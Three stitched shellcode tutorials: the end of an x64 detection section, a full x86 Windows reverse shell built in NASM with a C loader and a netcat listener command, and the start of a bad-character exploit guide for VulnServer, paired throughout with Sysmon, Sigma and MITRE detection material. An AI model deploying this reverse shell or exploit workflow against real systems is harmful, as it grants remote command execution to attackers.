Direct Win32 → Native API substitution	Call `Nt*` syscalls to bypass usermode hooks (`T1106`)
Reflective loading of a PE in memory	Shellcode bootstraps a full PE image without touching disk (`T1620`)

11. Defensive Strategies & Detection

Shellcode is observable at multiple layers. The most reliable signals come from the behaviours the techniques above require, not from the byte patterns they happen to produce.

Sysmon events to enable and triage:

EventID 1 — Process Create. Unusual parent/child chains (browser, Office, mail client spawning cmd.exe / powershell.exe) are the cheapest, highest-yield signal.
EventID 8 — CreateRemoteThread. Cross-process thread creation into LSASS, browsers, or signed Windows binaries is high-fidelity.
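EventID 10 — ProcessAccess. Watch GrantedAccess masks like 0x1FFFFF (PROCESS_ALL_ACCESS) and 0x1010 (PROCESS_QUERY_LIMITED_INFORMATION + PROCESS_VM_READ, the classic credential-dumping mask). For injection specifically, look for masks that include PROCESS_VM_WRITE (0x0020).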
EventID 17 / 18 — Pipe creation/connection, frequently used by shellcode-launched implants for C2.

ETW providers worth subscribing to in EDR pipelines:

Microsoft-Windows-Kernel-Process — kernel-side process/thread/image events.
Microsoft-Windows-Threat-Intelligence (PPL-only) — NtAllocateVirtualMemory, NtProtectVirtualMemory, NtWriteVirtualMemory, NtCreateThreadEx at the syscall layer. Because the events are emitted by the kernel, removing usermode hooks does not suppress them.
Microsoft-Windows-Security-Auditing — handle and object access.

Audit policies: Audit Process Creation (Success) and Audit Kernel Object surface the same events to the classic Security log for SIEM ingestion.

Behavioural signals defenders should hunt on:

Threads with StartAddress in MEM_PRIVATE regions that are PAGE_EXECUTE_* and not backed by a file image.
CallTrace containing UNKNOWN frames — the calling instruction lives in unbacked memory.
gs:[0x60] opcode pattern (65 48 8B 04 25 60 00 00 00) inside executable regions of non-system modules.
ROR-13 hashing loops in memory scans.
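The byte pattern quoted above is specific to mov rax, gs:[0x60]; loading the PEB into another register changes the ModRM byte and sometimes the REX prefix. The following is a minimal sketch of a more tolerant matcher over a raw memory dump. The regex and function name are my own, it covers only the absolute-address encoding with a SIB byte, and a hit is a lead for triage rather than proof of shellcode.

```python
import re

# 65            GS segment override
# 48 | 4C       REX.W (4C when the destination is r8-r15)
# 8B            mov r64, r/m64
# ModRM         mod=00, rm=100 (SIB follows); the reg field picks the destination
# 25            SIB: no base, no index, disp32 only
# 60 00 00 00   disp32 = 0x60
PEB_LOAD = re.compile(
    rb"\x65[\x48\x4C]\x8B[\x04\x0C\x14\x1C\x24\x2C\x34\x3C]\x25\x60\x00\x00\x00"
)

def find_peb_loads(buf: bytes) -> list:
    """Return the offsets of every `mov r64, gs:[0x60]` candidate in buf."""
    return [m.start() for m in PEB_LOAD.finditer(buf)]

# Synthetic sample: two NOPs, `mov rbx, gs:[0x60]`, then ret.
sample = b"\x90\x90" + bytes.fromhex("65488b1c2560000000") + b"\xc3"
print(find_peb_loads(sample))   # [2]
```

In practice you would run this over executable private regions exported by a memory-forensics tool and then check each hit against the surrounding disassembly.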

Sigma sketch — suspicious cross-process access typical of shellcode injection:

title: Suspicious Cross-Process Access With VM-Write Rights
logsource:
  product: windows
  service: sysmon
detection:
  selection:
    EventID: 10
    GrantedAccess:
      - '0x1FFFFF'   # PROCESS_ALL_ACCESS
      - '0x147A'     # includes PROCESS_VM_WRITE, PROCESS_VM_OPERATION, PROCESS_CREATE_THREAD
  filter_legit:
    SourceImage|endswith:
      - '\MsMpEng.exe'
      - '\WmiPrvSE.exe'
  condition: selection and not filter_legit
level: high
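When tuning a rule like this, it helps to decode each GrantedAccess value into its individual rights rather than memorising hex constants. The sketch below uses the documented process access-right bits from the Windows SDK; the table is deliberately partial and the function name is my own.

```python
# Subset of the documented process access rights (winnt.h).
PROCESS_RIGHTS = {
    0x0001: "PROCESS_TERMINATE",
    0x0002: "PROCESS_CREATE_THREAD",
    0x0008: "PROCESS_VM_OPERATION",
    0x0010: "PROCESS_VM_READ",
    0x0020: "PROCESS_VM_WRITE",
    0x0040: "PROCESS_DUP_HANDLE",
    0x0400: "PROCESS_QUERY_INFORMATION",
    0x1000: "PROCESS_QUERY_LIMITED_INFORMATION",
}

def decode_granted_access(mask) -> list:
    """Return the names of the rights set in a GrantedAccess value."""
    if isinstance(mask, str):
        mask = int(mask, 16)            # accepts '0x147a' as logged
    return [name for bit, name in sorted(PROCESS_RIGHTS.items()) if mask & bit]

for value in ("0x1010", "0x1410", "0x147A"):
    print(value, decode_granted_access(value))
```

Decoded this way, 0x1010 and 0x1410 turn out to be read-oriented masks, while 0x147A carries the write, operation, and thread-creation rights that remote injection needs.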

Hardening to deploy on monitored endpoints:

Arbitrary Code Guard (ACG) — denies the PAGE_EXECUTE_* transition that turns a MEM_PRIVATE shellcode buffer into runnable code.
Control Flow Guard (CFG) — invalidates indirect calls into unregistered targets, which shellcode entry points always are.
Block Win32 API calls from Office macros / child processes — Attack Surface Reduction rules that sever the most common shellcode delivery vector.
PPL-protected EDR with kernel ETW Ti subscription — preserves syscall-layer telemetry even when userland hooks are patched out.

A useful EDR tripwire is to permute the head of InMemoryOrderModuleList with stub entries: shellcode that walks two Flinks blindly resolves the decoy module, fails to find expected exports, and crashes — producing a high-fidelity detection.

12. Tools for x64 Shellcode Analysis

Tool	Description	Link
NASM	Assembler for the snippets in this tutorial; emits raw binary for direct hex inspection	`nasm.us`
Keystone Engine	Programmatic assembler (Python bindings) for bad-character analysis labs	`keystone-engine.org`
x64dbg	User-mode debugger; trace shellcode through `gs:[0x60]` and EAT walks	`x64dbg.com`
WinDbg	Inspect `_TEB`, `_PEB`, `_PEB_LDR_DATA`, `_LDR_DATA_TABLE_ENTRY` on the target build	`learn.microsoft.com`
Ghidra / IDA	Static analysis of shellcode-bearing samples and reflective loader stubs	`ghidra-sre.org`
Volatility 3	Memory forensics: enumerate suspicious `MEM_PRIVATE` + `RX` regions, hunt unbacked threads	`volatilityfoundation.org`
Process Hacker	Live triage of thread start addresses and memory protections	`processhacker.sourceforge.io`
Godbolt Compiler Explorer	Inspect MSVC-emitted x64 prologues to confirm ABI assumptions	`godbolt.org`

13. MITRE ATT&CK Mapping

Technique	MITRE ID	Detection
Process Injection (umbrella)	`T1055`	Sysmon `EventID 8` + `EventID 10` with VM-write `GrantedAccess`
DLL Injection	`T1055.001`	Image Load (`EventID 7`) from `MEM_PRIVATE`-allocated path
Portable Executable Injection	`T1055.002`	Volatility scans for PE headers in `MEM_PRIVATE` `RX` regions
APC Injection	`T1055.004`	ETW Ti `NtQueueApcThread` to remote thread; alerted thread-start addresses
Process Hollowing	`T1055.012`	`EventID 1` with suspended child, followed by `EventID 10` write + resume
Native API	`T1106`	ETW Ti syscall provider; direct `Nt*` calls outside `ntdll`
Obfuscated Files or Information	`T1027`	YARA on ROR-13 loops; entropy heuristics on dropped payloads
Reflective Code Loading	`T1620`	Unbacked `RX` memory with PE magic / no module image record

Summary

x64 Windows shellcode is governed by a strict ABI: argument registers RCX/RDX/R8/R9, return in RAX, a 32-byte shadow space, and 16-byte stack alignment at every call.
The PEB is reached via gs:[0x60] on x64; every subsequent offset (Ldr at +0x18, InMemoryOrderModuleList at +0x20, DllBase at +0x20 from InMemoryOrderLinks) differs from the x86 layout and must be verified against the target build.
Position-independent API resolution combines a PEB walk to kernel32.dll with an EAT walk using ROR-13 name hashing to avoid embedded strings.
Null-byte avoidance leans on 32-bit sub-register writes that zero-extend, RIP-relative lea, and XOR-then-push idioms.
Detection is layered: Sysmon EventID 8/10 for injection chains, ETW Threat-Intelligence for syscall-level memory writes, behavioural hunts for unbacked RX regions, and ACG/CFG/ASR hardening to deny the primitives shellcode depends on.


Writing Your First Shellcode: x86 Reverse Shell from Scratch

Objective: Understand how a Windows x86 reverse shell payload is hand-built in NASM assembly — walking the PEB to locate kernel32.dll, parsing the PE export table to resolve GetProcAddress without imports, initialising Winsock, and spawning cmd.exe over a socket — and learn the telemetry each stage emits so you can detect and defend against it.

1. What Is Shellcode? Constraints and Goals

Shellcode is a self-contained blob of machine code that runs after a control-flow hijack (or injection) with no loader, no imports, and no fixed base address. It is the raw payload that tools like msfvenom emit; understanding it byte-by-byte is what lets a defender recognise it in memory.

A Windows x86 reverse shell differs from a Linux equivalent in one fundamental way: Linux exposes a stable syscall/int 0x80 interface, while Windows forces you to call documented Win32 APIs — and you cannot import them, because injected code has no import table. You must therefore find the APIs yourself at runtime.

Constraint	Description
Position independent	Runs at an unknown address; all references are stack-relative or computed
Null-free	`\x00` terminates strings in many injection vectors and truncates the payload
No imports	API addresses must be resolved from loaded modules at runtime
Bad-char aware	`\x00`, `\x0a`, `\x0d` and vector-specific bytes must be avoided by design

Lab setup: a Windows 10 x86 VM, NASM for assembly, WinDbg for stepping the PEB walk, a small C runner to execute the blob, and a Python scanner to audit bad characters. Build and test only in an isolated VM.

2. x86 Calling Conventions and Stack Mechanics

Win32 APIs use stdcall: arguments are pushed right-to-left, and the callee cleans the stack with ret N. This matters because after a successful API call you do not adjust esp yourself — the function already did. cdecl (caller cleans) appears only in CRT helpers you will not touch here.

Convention	Stack Cleanup	Argument Order	Used By
`stdcall`	Callee (`ret N`)	Right-to-left	Win32 APIs (`CreateProcessA`, `WSASocketA`)
`cdecl`	Caller	Right-to-left	CRT functions

eax, ecx, and edx are volatile (caller-saved); ebx, esi, edi, and ebp survive a call. Shellcode exploits this: stash the kernel32 base in ebx and a resolver pointer in ebp, and they persist across every API call. Strings and structures are constructed by pushing dwords onto the stack in reverse, then referencing them directly through esp.

3. The PEB Walk: Finding kernel32.dll Without Imports

Every thread can reach its Process Environment Block (PEB) through the pointer stored in the TEB at FS:[0x30]. The PEB holds Ldr (a PEB_LDR_DATA) at +0x0C, whose InMemoryOrderModuleList at +0x14 is a doubly-linked list of loaded modules. For 32-bit processes on Windows 7 and later the observed order is normally [0] the executable → [1] ntdll.dll → [2] kernel32.dll, although nothing guarantees it. The list head’s FLink gives the first entry; two further FLink dereferences land on kernel32’s entry, and DllBase sits 0x10 bytes past the InMemoryOrderLinks field.

bits 32
    xor    eax, eax
    mov    eax, [fs:0x30]      ; TEB->ProcessEnvironmentBlock (PEB)
    mov    eax, [eax+0x0c]     ; PEB->Ldr (PEB_LDR_DATA)
    mov    eax, [eax+0x14]     ; Ldr->InMemoryOrderModuleList (1st: executable)
    mov    eax, [eax]          ; FLink -> ntdll.dll entry
    mov    eax, [eax]          ; FLink -> kernel32.dll entry
    mov    ebx, [eax+0x10]     ; LDR entry->DllBase (kernel32 base) -> ebx

Verify the chain live in WinDbg before trusting any offset on your target build:

0:000> dt nt!_TEB @$teb ProcessEnvironmentBlock
0:000> dt nt!_PEB @$peb Ldr
0:000> dt nt!_PEB_LDR_DATA poi(@$peb+0xc) InMemoryOrderModuleList
0:000> dl poi(poi(@$peb+0xc)+0x14) 4

Figure: The PEB walk chain from the TEB pointer at FS:[0x30] through PEB, PEB_LDR_DATA, and InMemoryOrderModuleList to the kernel32.dll base address. Two FLink dereferences past the first list entry land on kernel32.dll’s LDR entry; DllBase sits 0x10 bytes past the InMemoryOrderLinks field.

4. Export Table Parsing: Resolving GetProcAddress

The bootstrap problem: shellcode cannot call GetProcAddress until it has found GetProcAddress. The fix is to parse the kernel32 PE export table manually. From the base, e_lfanew at +0x3C reaches the NT headers; the export-directory RVA lives at NT +0x78; the directory exposes three parallel arrays — AddressOfNames (+0x20), AddressOfNameOrdinals (+0x24), and AddressOfFunctions (+0x1C).

; ebx = kernel32 base
    mov    eax, [ebx+0x3c]     ; e_lfanew
    mov    eax, [ebx+eax+0x78] ; export table RVA
    lea    edi, [ebx+eax]      ; edi -> IMAGE_EXPORT_DIRECTORY
    mov    ecx, [edi+0x20]     ; AddressOfNames RVA
    lea    ecx, [ebx+ecx]      ; -> name-pointer array
    xor    edx, edx            ; name index = 0
.next:
    mov    esi, [ecx+edx*4]    ; RVA of candidate name
    lea    esi, [ebx+esi]      ; -> ASCII name string
    ; compare esi against "GetProcAddress" (string or 4-byte hash) ...
    inc    edx
    jmp    .next
.match:
    mov    eax, [edi+0x24]     ; AddressOfNameOrdinals RVA
    movzx  eax, word [ebx+eax+edx*2]   ; ordinal index for this name
    mov    ecx, [edi+0x1c]     ; AddressOfFunctions RVA
    mov    eax, [ebx+ecx+eax*4]; function RVA
    lea    eax, [ebx+eax]      ; eax = VA of GetProcAddress

Production shellcode usually replaces the literal strcmp with a rolling 4-byte hash of each export name — it is smaller and naturally null-free.

Figure: PE export table structure, traversed from the kernel32 base address through the NT headers to the export directory. Shellcode walks three parallel export arrays (names, ordinals, and functions) to translate a name hash into the final virtual address of GetProcAddress.

5. Bootstrapping Further API Resolution

Once GetProcAddress is resolved, save it (e.g. in ebp) and use it to resolve everything else. The first follow-up is LoadLibraryA, which lets you bring in ws2_32.dll and resolve the Winsock functions the reverse shell needs.

; ebp = resolved GetProcAddress, ebx = kernel32 base
    xor    ecx, ecx
    push   ecx                 ; string terminator (runtime-supplied null)
    push   0x41797261          ; "aryA"
    push   0x7262694c          ; "Libr"
    push   0x64616f4c          ; "Load"
    mov    esi, esp            ; esi -> "LoadLibraryA"
    push   esi
    push   ebx                 ; hModule = kernel32
    call   ebp                 ; GetProcAddress -> LoadLibraryA in eax
    ; eax now holds LoadLibraryA; call it on "ws2_32.dll", then resolve
    ; WSAStartup, WSASocketA, WSAConnect, CreateProcessA, ExitProcess.

Every API name is pushed as reversed dwords so it reads correctly in memory. Wrap the resolve-and-call logic in a small subroutine that takes a module base and a name pointer; the reverse shell calls it once for each API it needs.
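Reading stack strings out of a disassembly is the mirror image of building them, and it is a routine triage step. The helper below is a minimal sketch (the name is hypothetical): it takes the pushed immediates in program order, reverses them to get memory order, and cuts at the first null.

```python
import struct

def decode_stack_string(pushed) -> bytes:
    """Rebuild the string that a sequence of `push imm32` leaves at ESP.

    `pushed` lists the immediates in the order the pushes execute; the last
    push ends up at the lowest address, so memory order is the reverse.
    """
    raw = b"".join(struct.pack("<I", dword) for dword in reversed(pushed))
    return raw.split(b"\x00", 1)[0]

print(decode_stack_string([0x41797261, 0x7262694C, 0x64616F4C]))  # b'LoadLibraryA'
print(decode_stack_string([0x00000000, 0x6578652E, 0x646D6320]))  # b' cmd.exe'
```

The same few lines recover DLL names and command lines from most hand-written x86 payloads that use this staging style.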

6. Winsock Initialisation and Socket Creation

WSAStartup(0x0202, &wsaData) must run before any socket API. Reserve the 400-byte WSADATA on the stack and pass a pointer; the OS fills it. Then WSASocketA(2, 1, 6, NULL, 0, 0) creates a TCP socket (AF_INET, SOCK_STREAM, IPPROTO_TCP).

    sub    esp, 0x190          ; reserve WSADATA (400 bytes)
    push   esp                 ; lpWSAData
    push   0x0202              ; wVersionRequired = 2.2
    call   <WSAStartup>

    xor    eax, eax
    push   eax                 ; dwFlags
    push   eax                 ; g
    push   eax                 ; lpProtocolInfo = NULL
    push   6                   ; IPPROTO_TCP
    push   1                   ; SOCK_STREAM
    push   2                   ; AF_INET
    call   <WSASocketA>        ; eax = socket handle
    mov    edi, eax            ; save socket in edi

Build the 16-byte SOCKADDR_IN inline and connect. The IP and port are stored in network byte order (big-endian), so when pushed as little-endian dwords 127.0.0.1 becomes 0x0100007f and the packed family/port pair for port 4444 becomes 0x5c110002.

    xor    eax, eax
    push   eax                 ; sin_zero[4..8]
    push   eax                 ; sin_zero[0..4]
    push   0x0100007f          ; sin_addr  = 127.0.0.1
    push   0x5c110002          ; sin_port 4444 | sin_family AF_INET
    mov    esi, esp            ; esi -> SOCKADDR_IN

    push   eax                 ; lpCallee/QoS chain (NULLs)
    push   eax
    push   eax
    push   eax
    push   0x10                ; namelen
    push   esi                 ; name -> SOCKADDR_IN
    push   edi                 ; socket
    call   <WSAConnect>
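The two SOCKADDR_IN immediates are exactly what an analyst wants to extract from a captured blob, because they carry the callback address. This sketch decodes them with the standard library; the function name is my own and it assumes the two-dword layout used above (family and port in the first dword, IPv4 address in the second).

```python
import socket
import struct

def decode_sockaddr_in(family_port: int, addr: int):
    """Recover (family, port, ip) from the two dwords pushed for SOCKADDR_IN."""
    raw = struct.pack("<II", family_port, addr)    # bytes as they sit in memory
    (family,) = struct.unpack_from("<H", raw, 0)   # sin_family: host order
    (port,) = struct.unpack_from(">H", raw, 2)     # sin_port: network order
    ip = socket.inet_ntoa(raw[4:8])                # sin_addr: network order
    return family, port, ip

print(decode_sockaddr_in(0x5C110002, 0x0100007F))  # (2, 4444, '127.0.0.1')
```

A family value of 2 is AF_INET, which matches the first argument passed to WSASocketA earlier in the listing.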

7. Spawning cmd.exe Over the Socket

The final stage is the most error-prone: a fully populated 68-byte STARTUPINFOA with cb = 0x44, dwFlags = STARTF_USESTDHANDLES (0x100), and all three standard handles pointed at the connected socket. CreateProcessA(NULL, " cmd.exe", ...) then launches the shell with stdin/stdout/stderr riding the TCP stream.

    xor    eax, eax
    push   edi                 ; hStdError  = socket
    push   edi                 ; hStdOutput = socket
    push   edi                 ; hStdInput  = socket
    times 2 push eax           ; lpReserved2, then cbReserved2/wShowWindow
    push   0x00000100          ; dwFlags = STARTF_USESTDHANDLES (offset 0x2C)
    times 10 push eax          ; dwFillAttribute..dwX (7 dwords), lpTitle, lpDesktop, lpReserved
    push   0x44                ; cb = sizeof(STARTUPINFOA)
    mov    ebx, esp            ; ebx -> STARTUPINFOA

    sub    esp, 0x10
    mov    esi, esp            ; esi -> PROCESS_INFORMATION

    push   eax                 ; "....\0" terminator (runtime-supplied null)
    push   0x6578652e          ; ".exe"
    push   0x646d6320          ; " cmd"  (0x20 = space, null-free)
    mov    edx, esp            ; edx -> " cmd.exe"

    push   esi                 ; lpProcessInformation
    push   ebx                 ; lpStartupInfo
    push   eax                 ; lpCurrentDirectory
    push   eax                 ; lpEnvironment
    push   eax                 ; dwCreationFlags
    inc    eax
    push   eax                 ; bInheritHandles = TRUE
    dec    eax
    push   eax                 ; lpThreadAttributes
    push   eax                 ; lpProcessAttributes
    push   edx                 ; lpCommandLine = " cmd.exe"
    push   eax                 ; lpApplicationName = NULL
    call   <CreateProcessA>

    push   eax                 ; uExitCode
    call   <ExitProcess>
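Because STARTUPINFOA is built by hand here, a miscounted push silently shifts dwFlags or the handles to the wrong field. One way to check the layout independently is to model the 32-bit structure in ctypes. In this sketch every pointer and HANDLE is declared as a 32-bit integer so the offsets match x86 regardless of the host; the class name is my own, and the field order follows the documented structure.

```python
import ctypes

class STARTUPINFOA32(ctypes.Structure):
    """32-bit STARTUPINFOA; pointers and handles modelled as c_uint32."""
    _fields_ = [
        ("cb", ctypes.c_uint32),
        ("lpReserved", ctypes.c_uint32),
        ("lpDesktop", ctypes.c_uint32),
        ("lpTitle", ctypes.c_uint32),
        ("dwX", ctypes.c_uint32),
        ("dwY", ctypes.c_uint32),
        ("dwXSize", ctypes.c_uint32),
        ("dwYSize", ctypes.c_uint32),
        ("dwXCountChars", ctypes.c_uint32),
        ("dwYCountChars", ctypes.c_uint32),
        ("dwFillAttribute", ctypes.c_uint32),
        ("dwFlags", ctypes.c_uint32),
        ("wShowWindow", ctypes.c_uint16),
        ("cbReserved2", ctypes.c_uint16),
        ("lpReserved2", ctypes.c_uint32),
        ("hStdInput", ctypes.c_uint32),
        ("hStdOutput", ctypes.c_uint32),
        ("hStdError", ctypes.c_uint32),
    ]

print("sizeof    =", hex(ctypes.sizeof(STARTUPINFOA32)))
print("dwFlags   @", hex(STARTUPINFOA32.dwFlags.offset))
print("hStdInput @", hex(STARTUPINFOA32.hStdInput.offset))
```

The structure is 17 dwords long. Counting down from hStdError, dwFlags is the sixth dword pushed, and ten more zero dwords separate it from cb.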

Figure: The full reverse shell execution chain: PEB walk, export parsing, Winsock initialisation, TCP connect, STARTUPINFOA setup, and the final CreateProcessA call spawning cmd.exe. Every stage builds on the last: the PEB walk feeds export parsing, which unlocks Winsock, which provides the socket handle wired into cmd.exe’s standard I/O.

8. Null-Byte Elimination and Bad-Character Audit

A single \x00 mid-payload can truncate your shellcode. Design it out from the start.

Bad Byte	Naive Source	Null-Free Replacement
`\x00`	`mov ecx, 0`	`xor ecx, ecx`
`\x00` in string	`push 0x00657865` (“exe\0”)	terminator from `push eax` after `xor eax,eax`
`\x00` in `mov al,0`	`mov al, 0`	`xor eax, eax` then use `al`
`\x0a` / `\x0d`	constant containing CR/LF	re-encode IP/port or split the immediate

The runtime-supplied terminator trick (xor eax, eax → push eax) keeps the " cmd.exe" string null-free. The leading space that pads " cmd" to a full dword is tolerated by CreateProcessA’s command-line parser. Audit the assembled binary with a scanner:

import sys
BAD = {0x00, 0x0a, 0x0d}                # extend per injection vector

with open(sys.argv[1], "rb") as f:
    sc = f.read()
for i, b in enumerate(sc):
    if b in BAD:
        print(f"[!] bad char 0x{b:02x} at offset {i}")
print(f"[*] {len(sc)} bytes scanned")

9. Testing and Verification

Assemble to a flat binary, then execute it in a controlled runner that mirrors how an exploit lands code in memory — VirtualAlloc with PAGE_EXECUTE_READWRITE, copy, and call through a function pointer.

nasm -f bin reverse.asm -o reverse.bin
python3 badchars.py reverse.bin

#include <windows.h>
#include <string.h>
unsigned char sc[] = { /* contents of reverse.bin */ };

int main(void) {
    void *mem = VirtualAlloc(NULL, sizeof(sc),
                             MEM_COMMIT | MEM_RESERVE,
                             PAGE_EXECUTE_READWRITE);   // RWX: loud, lab-only
    memcpy(mem, sc, sizeof(sc));
    ((void(*)())mem)();
    return 0;
}

Catch the callback with nc -lvnp 4444. Note the RWX allocation — real-world loaders allocate RW, copy, then flip to RX with VirtualProtect precisely because PAGE_EXECUTE_READWRITE is a classic detection signal.

10. Common Attacker Techniques

Technique	Description
PEB walk	Locate `kernel32.dll` base with no imports via `FS:[0x30]`
Export hashing	Resolve APIs by name hash to stay small and null-free
Stack string building	Push reversed dwords to stage `" cmd.exe"`, `ws2_32.dll`, API names
STDIO redirection	Point `hStdInput/Output/Error` at the socket for an interactive shell
Process injection	Deliver the blob via `VirtualAllocEx` + `WriteProcessMemory` + `CreateRemoteThread`
RW → RX staging	Allocate `RW`, copy, `VirtualProtect` to `RX` to evade RWX heuristics

11. Defensive Strategies and Detection

Each shellcode stage emits telemetry. Map detections to the chain, not to a single indicator.

Sysmon Event ID	Name	What It Catches
`1`	Process Create	`cmd.exe` with an unexpected `ParentImage` / `ParentCommandLine`
`3`	Network Connection	Outbound TCP from `cmd.exe` or a non-browser binary (C2 connect-back)
`8`	CreateRemoteThread	Cross-process thread where `SourceImage` ≠ `TargetImage`
`10`	ProcessAccess	`GrantedAccess` to injected memory; `CallTrace` containing `UNKNOWN`
`11`	FileCreate	Shellcode or loader dropped to disk

Windows Security auditing adds Event 4688 (process creation with command line, when ProcessCreationIncludeCmdLine_Enabled = 1), 5156 (WFP outbound TCP allowed — the reverse connect at the network layer), and 4689 (process exit, for shell-lifetime correlation). The kernel Microsoft-Windows-Threat-Intelligence ETW provider emits KERNEL_THREATINT_TASK_ALLOCVM/PROTECTVM on RWX activity but requires a signed ELAM/PPL consumer.

The canonical community Sigma rule for shellcode injection keys on ProcessAccess:

title: Shellcode Process Injection via Suspicious ProcessAccess
logsource:
  category: process_access
  product: windows
detection:
  selection:
    GrantedAccess:
      - '0x147a'
      - '0x1f3fff'
    CallTrace|contains: 'UNKNOWN'
  condition: selection
tags:
  - attack.defense_evasion
  - attack.privilege_escalation
  - attack.t1055
level: high

Hardening: enable command-line auditing, deploy a tuned Sysmon baseline (SwiftOnSecurity / Olaf Hartong) for EIDs 1/3/8/10, enforce default-deny egress on workstations (reverse shells need outbound TCP), apply ASR rules such as D4F940AB-401B-4EFC-AADC-AD5F3C50688A (block Office child processes) and d3e037e1-3eb8-44c8-a917-57927947596d (block JavaScript or VBScript from launching downloaded executable content), and alert on VirtualAlloc(RWX). AMSI does not see raw shellcode but catches PowerShell/VBScript loaders.

Figure: Each shellcode execution stage mapped to its detection telemetry source, including Windows Event IDs, Sysmon event IDs, ETW providers, ASR rules, and egress firewall controls. Effective defence maps detections to each stage of the kill chain rather than relying on a single indicator: RWX allocation, outbound TCP, and process creation each emit distinct, correlatable telemetry.

12. Tools for Shellcode Analysis

Tool	Description	Link
NASM	Assemble x86 to flat binary	`nasm.us`
WinDbg	Step the PEB walk and export parse live	`microsoft.com`
x64dbg	Dynamic analysis of the loader and payload	`x64dbg.com`
Ghidra	Static disassembly of extracted shellcode	`ghidra-sre.org`
Radare2	Lightweight disassembly and patching	`radare.org`
Sysmon	Generate EID 1/3/8/10 detection telemetry	`microsoft.com`
Volatility	Memory forensics — recover RWX regions and injected code	`volatilityfoundation.org`

13. MITRE ATT&CK Mapping

Technique	MITRE ID	Detection
Command and Scripting Interpreter: Windows Command Shell	`T1059.003`	Sysmon EID 1 / 4688 `cmd.exe` spawn chain
Process Injection	`T1055`	Sysmon EID 10 `GrantedAccess` + `CallTrace UNKNOWN`
Process Injection: DLL Injection	`T1055.001`	Sysmon EID 7/8 on reflective-DLL delivery
Obfuscated Files or Information	`T1027`	Null-free/encoded IP/port constants in the blob
Non-Application Layer Protocol	`T1095`	Sysmon EID 3 / 5156 raw TCP from non-browser process
Application Layer Protocol: Web Protocols	`T1071.001`	Proxy/TLS inspection (contrast C2 transport)
System Information Discovery	`T1082`	PEB walk as in-memory module discovery
Native API	`T1106`	Direct `WSASocketA` / `CreateProcessA` calls without framework APIs

Summary

A Windows x86 reverse shell is just position-independent code that resolves its own APIs, opens a TCP socket, and redirects cmd.exe over it.
The PEB walk (FS:[0x30] → Ldr → InMemoryOrderModuleList, third entry) locates kernel32.dll with no imports.
Parsing the PE export table resolves GetProcAddress, which bootstraps LoadLibraryA and every Winsock function.
Null-byte and bad-character avoidance is a design constraint, not a post-step — xor for zero, reversed stack strings, runtime-supplied terminators.
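Detection follows the same chain: Sysmon EIDs 1/3/8/10, Security events 4688/5156, and Threat-Intelligence ETW each observe a different stage, so correlate them rather than relying on a single indicator.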


Bad Characters, Null Bytes, and Restricted Character Sets

Objective: Understand why certain bytes corrupt, truncate, or transform shellcode in stack-based buffer overflows, how to systematically enumerate a target’s restricted character set, and how to adapt encoding or instruction substitution to survive those constraints — alongside how defenders detect the resulting exploitation patterns.

1. What Are Bad Characters? The Concept Explained

A bad character is any byte that causes the vulnerable application’s input-handling routine to misbehave by corrupting, truncating, or transforming the payload before it lands in the destination buffer. There is no universal set. The exact bad characters depend on the application’s parsing logic and the protocol in use.

Shellcode cannot contain bytes that the target interprets incorrectly — a newline, a delimiter, or a string terminator. The root cause is usually a string-handling function. C runtime (CRT) routines like strcpy, strncpy, strcat, sprintf, and the deprecated gets operate on null-terminated buffers and stop on specific sentinel bytes.

When you inspect memory after a crash, you are hunting for three distinct failure modes:

Missing bytes — characters stripped entirely by a sanitiser.
Altered bytes — characters transformed (e.g., \x80 appearing as \x01).
Premature termination — a byte that halts the copy, so nothing after it is written.

Identifying which bytes trigger these behaviors is a mandatory phase before any reliable shellcode can be placed.

Flow diagram showing how a raw payload passes through a string API and produces three failure modes: missing bytes, altered bytes, and premature truncation before reaching the destination buffer — Three distinct ways a bad character corrupts a payload before it ever reaches the destination memory region.

2. Why `\x00` Is Always the First Enemy

The null byte (\x00) is always a bad character in string-based overflows. C-style string functions treat \x00 as the terminator, so any shellcode byte following a null is silently discarded.

Function	Behavior on `\x00`
`strcpy`	Stops copying at the first null
`strncpy`	Stops at null or `n` bytes
`strlen`	Returns length up to first null
`sprintf`	Terminates the formatted string
`gets`	Reads until newline (`\x0A`) rather than null; legacy, present in old targets

At the assembly level, strlen walks the buffer comparing each byte to zero and breaks on a match — that loop defines the truncation boundary. This is not a convention; it is a property of how the Windows CRT and Win32 LPSTR / LPWSTR parameters handle null-terminated strings.

Network contexts differ. A socket recv call reads up to a requested byte count and treats the data as opaque, so null bytes arriving on the wire land in the buffer intact. \x00 may therefore survive transport but still die the moment the data hits a strcpy. Treat the string API and the socket as separate constraint layers.
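The two layers can be modelled in a few lines. This is a minimal sketch, not the CRT itself: c_strcpy is a hypothetical helper that imitates the stop-at-first-null behaviour described above.

```python
def c_strcpy(src: bytes) -> bytes:
    """Model strcpy: copy bytes up to, but not including, the first null."""
    return src.split(b"\x00", 1)[0]

received = b"AB\x00CD"        # what recv() placed in the buffer, null included
copied = c_strcpy(received)   # what survives the downstream string copy

print(len(received), len(copied))
```

The transport layer delivered all five bytes; the string layer kept only the two before the null.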

3. Common Bad Characters by Protocol and Context

Restrictions come from three sources: protocol-specific rules (HTTP terminating on \x0D\x0A), application sanitisation (stripping nulls or high bytes), and encoding layers (Base64 or Unicode transformations).

Byte	Hex	Reason
Null	`\x00`	String terminator — always bad in string overflows
Line Feed	`\x0A`	Newline — terminates input in many protocol parsers
Carriage Return	`\x0D`	CR — terminates input lines (HTTP, SMTP, POP3)
Space	`\x20`	Whitespace delimiter — terminates tokens in some parsers
0xFF byte	`\xFF`	Causes issues in some parsing contexts

A web server vulnerable in its URI handler is the canonical restricted-set case: the legal URI character set is small, and non-printable or extended characters are rejected outright, narrowing or preventing exploitation. SMTP, POP3, and FTP argument parsers each impose their own delimiters.
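A quick pre-flight check can flag restricted bytes in any blob before it is sent. The sketch below assumes the example set from the table (null, LF, CR, space); RESTRICTED and find_restricted are illustrative names, and the real set must still be enumerated per target.

```python
RESTRICTED = bytes([0x00, 0x0A, 0x0D, 0x20])  # example set only; not universal

def find_restricted(payload: bytes, restricted: bytes = RESTRICTED) -> list:
    """Return (offset, byte) for every restricted byte found in payload."""
    return [(i, b) for i, b in enumerate(payload) if b in restricted]

sample = b"GET /index.html\r\n"
hits = find_restricted(sample)
for offset, value in hits:
    print(f"offset {offset}: \\x{value:02x}")
```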

4. Building and Sending the Test Byte Array

The standard methodology: generate every non-null byte (\x01–\xFF), place it after the EIP-overwrite offset, crash the target, and compare sent versus received in memory. Python builds the array cleanly:

# Generate \x01 through \xFF (255 bytes, null excluded)
badchar_test = bytearray(range(1, 256))

offset   = 2003                     # VulnServer TRUN EIP offset (illustrative)
